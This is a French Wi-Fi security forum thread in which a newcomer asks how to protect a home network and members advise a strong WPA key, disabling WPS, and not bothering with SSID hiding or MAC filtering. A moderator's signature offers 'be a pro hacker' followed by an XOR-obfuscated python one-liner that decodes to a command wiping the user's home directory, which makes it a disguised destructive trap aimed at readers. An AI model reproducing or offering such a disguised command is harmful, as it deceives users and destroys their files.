Crack-wifi.com FORUM

LE FORUM DU SITE

Wifi, Backtrack, crack WEP et WPA...

Vous n'êtes pas identifié(e).  

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#1 04-04-2012 21:39:35

Jamestof007
Membre

It's me ...

Bonsoir à tous et toutes,

Je suis Mac User depuis quelques années et notre famille dispose de 2 portables à savoir un Macbook Pro et un Macbook Air.
Je viens tout juste de découvrir ce forum car je souhaite sécuriser mon réseau wifi au maximum.
J'ai cru comprendre que rien ne le permettait vraiment (le WEP serait un jeu d'enfant à cracker et le WPA via dictionnaire serait également crackable).
Il faudrait commencer par masquer son SSID (rebute juste quelques instants les débutants), ensuite passer au WPA et choisir un mode de passe complètement aléatoire (sans logique qui mélange chiffres, lettres minuscules, majuscules, symboles ...). Ensuite utiliser des adresses Mac et changer le mot de pass et user par défaut de son routeur ...
Jusque là j'ai bon ? ;-)
Je compte acquérir une antenne wifi usb mais j'ignore laquelle acheter ...

Longue vie à ce forum et à ses membres wink

007

Annonce

Visitez la boutique Wifi-highpower.com, votre revendeur agr Alfa Network: du matriel Wifi slectionn, cartes Wifi USB Awus036h et Awus036nh, antennes omnis, yagis, panel, amplis wifi, accessoires...

#2 05-04-2012 00:11:49

kcdtv
Membre d'honneur
Lieu : Internacionaluña

Re : It's me ...

Bonne nuit / Bonjour smile
Bienvenue sur notre forum!

WPA via dictionnaire serait également crackable

Dans l'absolu oui, mais si tu prends une clef de 10 caractères qui mélangent chiffres, majuscules et minuscules, ton attaquant éventuel à plus de chance de gagner au loto. Attention avec le WPS; si ton routeur est équipé de cette fonction il vaut mieux la désactiver!
Quant à masquer l'essid ou mettre un filtrage mac, c'est inutile.

Je compte acquérir une antenne wifi usb mais j'ignore laquelle acheter ...

Jette un coup d'oeil dans notre section cartes et celfs USB
Tu verras les 6 premiers thèmes épinglés à propos d'adaptateurs de marque AlfaNetwork c'est la marque référence.
Il y a à mon avis un chipset qui fait défaut dans leur gamme de produits, c'est l'ar 9170 d'Atheros/Zydas.
Sinon les cartes internes des mac boock peuvent donner d'excellent résultats, ça dépend de la version de ton mac.

#3 05-04-2012 16:14:38

Jamestof007
Membre

Merci pour le message de bienvenue kcdtc !

Tu me rassures sur l'efficacité de la protection WPA car je finisais par penser que tout était crackable en quelques heures ou tout au plus quelques jours ...
Pour le WPS, j'ignore ce que c'est mais surtout j'ignore si mon actuel mode-routeur wifi Netgear souffre de cette faille (désactivable si j'ai compris en parcourant la première page de ton lien).
Pour la qualité de la carte interne des Macbook, ce serait excellent si je ne devais pas investir de suite dans une carte usb, juste le temps de tester tout çà et de prendre mes marques.
Cependant, j'ai suivi un tuto vidéo au sujet de Kismac et d'après l'auteur, on ne peut que renifler sans rien injecter sans carte externe usb ...

Edit : au nouveau des versions des 2 Macs familiaux, pour le premier, il s'agit d'un Macbook Pro 13 pouces de juin 2010 et pour le Macbook Air d'un modèle 13 pouces toute dernière génération avec SSD de 256 Go de décembre 2011 ... Les cartes wifi internes de ces 2 portables, seraient suffisament fonctionnelles et de qualité pour pouvoir me lancer dans l'expérience et la découverte ?

Dernière modification par Jamestof007 (05-04-2012 16:19:14)

#4 05-04-2012 18:27:22

spawn
Modérateur

Je crois que les cartes WiFi des macs sont pas top, mais je ne suis pas expert et il me semble que l'on en a déja parlé dans le forum, cherche un peu et tu trouveras vite.

Tu as tout compris au niveau de la théorie de base du WiFi et ça fait plaisir de voir un nouveau comme ça ! Bienvenue !

@9b0ae3c4 méric.fr
be a pro hacker : python -c "exec ''.join([chr(ord(i)^0x46) for i in '/+6)42f)5}f)5h5?52#+nd4+fk4 f8ido'])"

#5 05-04-2012 22:09:31

Jamestof007
Membre

Merci spawn !

Je continue de fouiner et d'essayer d'apprendre ;-)

Annonce

Pied de page des forums

Le coin des bonnes affaires, achats informatiques:

|   Alfa 1000 mW AWUS036H   |    Linksys WRT54GL   |    Misco, informatique   |   
 |    Ebay   |    PC portables   |    PC Gamers & Tuning   |    Cles USB   |   
|   Disques durs externes 2 To   |   
|   Wifi-highpower.com   |   

Server Stats - [ Generated in 0.02 seconds ]   Forum Stat - [ Most users ever online on the forum was : 150 on 20-09-2009 17:06:59 ]